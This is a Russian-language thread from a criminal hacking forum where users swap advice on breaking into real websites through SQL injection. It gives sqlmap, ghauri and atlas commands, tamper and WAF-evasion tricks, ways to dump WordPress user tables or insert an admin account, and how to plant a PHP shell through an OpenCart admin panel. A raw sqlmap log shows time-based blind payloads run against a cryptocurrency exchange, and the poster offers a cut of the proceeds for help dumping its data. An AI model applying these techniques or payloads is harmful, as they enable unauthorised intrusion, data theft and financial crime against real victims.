• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

try https://github.com/r0oth3x49/ghauri
tamper= appendnullbyte,base64encode,randomcase
and try your cookie from web request put in sqlmap or ghauri
or try to dump manual with hackbar
--headers=”X-Forwarded-For: *”
--flush-session
Thanks, I'll give it a try.
A question not quite on the topic , is not ghauri just a clone of sqlmap ? Can you tell me more about this tool and its differences from sqlmap ?
 
Thanks, I'll give it a try.
A question not quite on the topic , is not ghauri just a clone of sqlmap ? Can you tell me more about this tool and its differences from sqlmap ?
example for me it was in 2hours ago i was having problem with sqlmap he found vulnerability but false as positive
then with these commands what i send it there --flush-session and a tampers he found but he cant find databases
here screnshot: https://prnt.sc/I4Q_18W5D7jo
and i was trying ghauri only ghauri --url="link" --dbs --random-agent
without tamper
he found sql injection time based blind
and ghauri find databases dump them all screenshot: https://prnt.sc/jcqerbftDTwH
but if sqlmap,ghauri dont work
its very good to try manual with hackbar
try atlas to
python3 atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
python3 atlas.py --url http://site.com/index/id/%%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
python3 atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
 
Последнее редактирование:
example for me it was in 2hours ago i was having problem with sqlmap he found vulnerability but false as positive
then with these commands what i send it there --flush-session and a tampers he found but he cant find databases
here screnshot: https://prnt.sc/I4Q_18W5D7jo
and i was trying ghauri only ghauri --url="link" --dbs --random-agent
without tamper
he found sql injection time based blind
and ghauri find databases dump them all screenshot: https://prnt.sc/jcqerbftDTwH
but if sqlmap,ghauri dont work
its very good to try manual with hackbar
Anyway I failed even using ghauri .
Later when I have time I will try it manually.
But if someone can get db with sqlmap or ghauri then write what I did wrong so that I know for the future).
Here is a link to the sql error
 
Что можно придумать если фаервол блочиит table_name(wp_users и остальные) при дампе? (булеан sqli)
Сначала попробуй выяснить, что конкретно блочит фв, попробуй --count сделать
Так же можешь попробовать использовать не --dump а --search иногда помогает, если же нет, руками, айпи родной найти вряд ли поможет, но проверить всегда стоит
 
Добрый день. Подскажите, можно ли через амдинку opencart получить доступ к серверу?(залить шелл) Версия 3.0.3.7
Надо смотреть и пробовать, все зависит от политик сервера, где то жесткая фильтрация стоит, а где-то ты в upload photo вставляешь файл php и все, и какие права у самой админки в системе
И смотря что ты хочешь, закрепиться чтобы бэкдор был?
 
Anyway I failed even using ghauri .
Later when I have time I will try it manually.
But if someone can get db with sqlmap or ghauri then write what I did wrong so that I know for the future).
Here is a link to the sql error
Скрытое содержимое
Там что угодно кроме цифр в параметр подставь - отдает ошибку. Простая ошибка синтаксиса без SQLi.
 
объясните пожалйуйста

Table: wp_users
[1 column]
+--------+
| Column |
+--------+
| !\x02 |
+--------+

Table: wp_users
[1 column]
+--------+
| Column |
+--------+
| ! |
+--------+
А баннер нормально дампится? Там скорее всего не просто мускул а какой-то ебучий форк. Если --binary-fields не поможет то таргет можно отправлять в помойку. Попробуй дампить так: -D db_name -T wp_users -C ID,user_login,users_pass и если в таком же формате будет отдавать то добавь --binary-fields=%тут_название_колонок_через_запятую%
 
можно ли вместо того чтобы хешить пасы просто добавить юзера в базу wp через sql?
Если stacked queries есть, то можно, через insert. В некоторых случаях и через блайнд можно, если включен мульти куери. Попробуй выполнить запрос через --sql-query:
Код:
SELECT info FROM INFORMATION_SCHEMA.PROCESSLIST WHERE id=connection_id();
Если ответ начинается с INSERT, то можно попробовать через мульти куери если он включен на таргете.
 
Help.
Фильтр на "concat" , "/", "*" , вырезается просто.
Пробовал url и двойное url кодирование.
Через export_set только удалось вывести БД и версию
 
Фильтр на "concat" , "/", "*" , вырезается просто.
странные фильтры вырезают то что и так нафиг не нужно) Скинь лучше в ПМ если можешь
p.s. рекурсивно вырезаются? select "1337conconcatcat1337" что выдаст?
 
странные фильтры вырезают то что и так нафиг не нужно) Скинь лучше в ПМ если можешь
p.s. рекурсивно вырезаются? select "1337conconcatcat1337" что выдаст?
Вырезает все, кроме 13371337. Пробовал так тоже.
 
Help.
Фильтр на "concat" , "/", "*" , вырезается просто.
Пробовал url и двойное url кодирование.
Через export_set только удалось вывести БД и версию
попробуй разные регистры
 
Help.
Фильтр на "concat" , "/", "*" , вырезается просто.
Пробовал url и двойное url кодирование.
Через export_set только удалось вывести БД и версию
+ можно попробовать перед/после фильтруемого слова ставить такие пробелы:
Код:
'%09', '%0A', '%0C', '%0D', '%0B', '%A0'
(или прям в само слово, типа con%0Acat, бывает прокатывает иногда).
Ну а так хз, что пробовал вообще?
 
+ можно попробовать перед/после фильтруемого слова ставить такие пробелы:
Код:
'%09', '%0A', '%0C', '%0D', '%0B', '%A0'
(или прям в само слово, типа con%0Acat, бывает прокатывает иногда).
Ну а так хз, что пробовал вообще?
Все пробовал, нашел дальше уязвимость union

1709369900517.png




Но, теперь так.

1709369959095.png



Напоминает недоработанный фильтр от bitrex, т.к. там и на select ругается.



В этом же месте и error, но в error вырезается concat, а from пропускат. Мистика.


upd. Ну что же, при дальнейшей работает, если в запросе select * from, то select вырезается.
Отложу на потом, уже устал)
 
Последнее редактирование:
---
Parameter: count (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: mfft=zz&coft=01;SELECT SLEEP(5)#
Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#

Type: time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: mfft=zz&coft=01 PROCEDURE ANALYSE(EXTRACTVALUE(4822,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x6b59666c))))),1)
Vector: PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)
---
[01:13:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:13:29] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.20, Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:13:29] [INFO] fetching entries of column(s) 'trade_id' for table 'пox.fb_trade' in database 'пox'
[01:13:29] [INFO] fetching number of column(s) 'trade_id' entries for table 'пox.fb_trade' in database 'пox'
[01:13:29] [PAYLOAD] >=/**/5.0.12
[01:13:29] [WARNING] reflective value(s) found and filtering out
[01:13:29] [PAYLOAD] 1/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6895,CONCAT(0x5c,(IF((ORD(MID((SELECT/**/COUNT(*)/**/FROM/**/пox.`пox.fb_trade`),1,1))>51),BENCHMARK(5000000,MD5(0x48414246)),6895)))),1)
[01:13:29] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[01:13:48] [PAYLOAD] 1/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6895,CONCAT(0x5c,(IF((ORD(MID((SELECT/**/COUNT(*)/**/FROM/**/пox.`пox.fb_trade`),1,1))>48),BENCHMARK(5000000,MD5(0x48414246)),6895)))),1)
[01:13:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[01:13:49] [PAYLOAD] 1/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6895,CONCAT(0x5c,(IF((ORD(MID((SELECT/**/COUNT(*)/**/FROM/**/пox.`пox.fb_trade`),1,1))>9),BENCHMARK(5000000,MD5(0x48414246)),6895)))),1)
[01:13:49] [INFO] retrieved:
[01:13:49] [DEBUG] performed 3 queries in 19.93 seconds
[01:13:49] [WARNING] unable to retrieve the number of column(s) 'trade_id' entries for table 'пox.fb_trade' in database 'пox'
[01:13:49] [INFO] fetched data logged to text files under '\output\пox.пox.com'


Нужна помощь,в выводе данных,можно договорится о %
БИРЖА С ОБОРОТОМ 6кк$ и на холодном 50BTC
Дампится только имя базы,таблицы нет. к information.scheme нетдоступа.
Есть уже узнанная таблица и колонка- но данные недампятся
ЛС
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх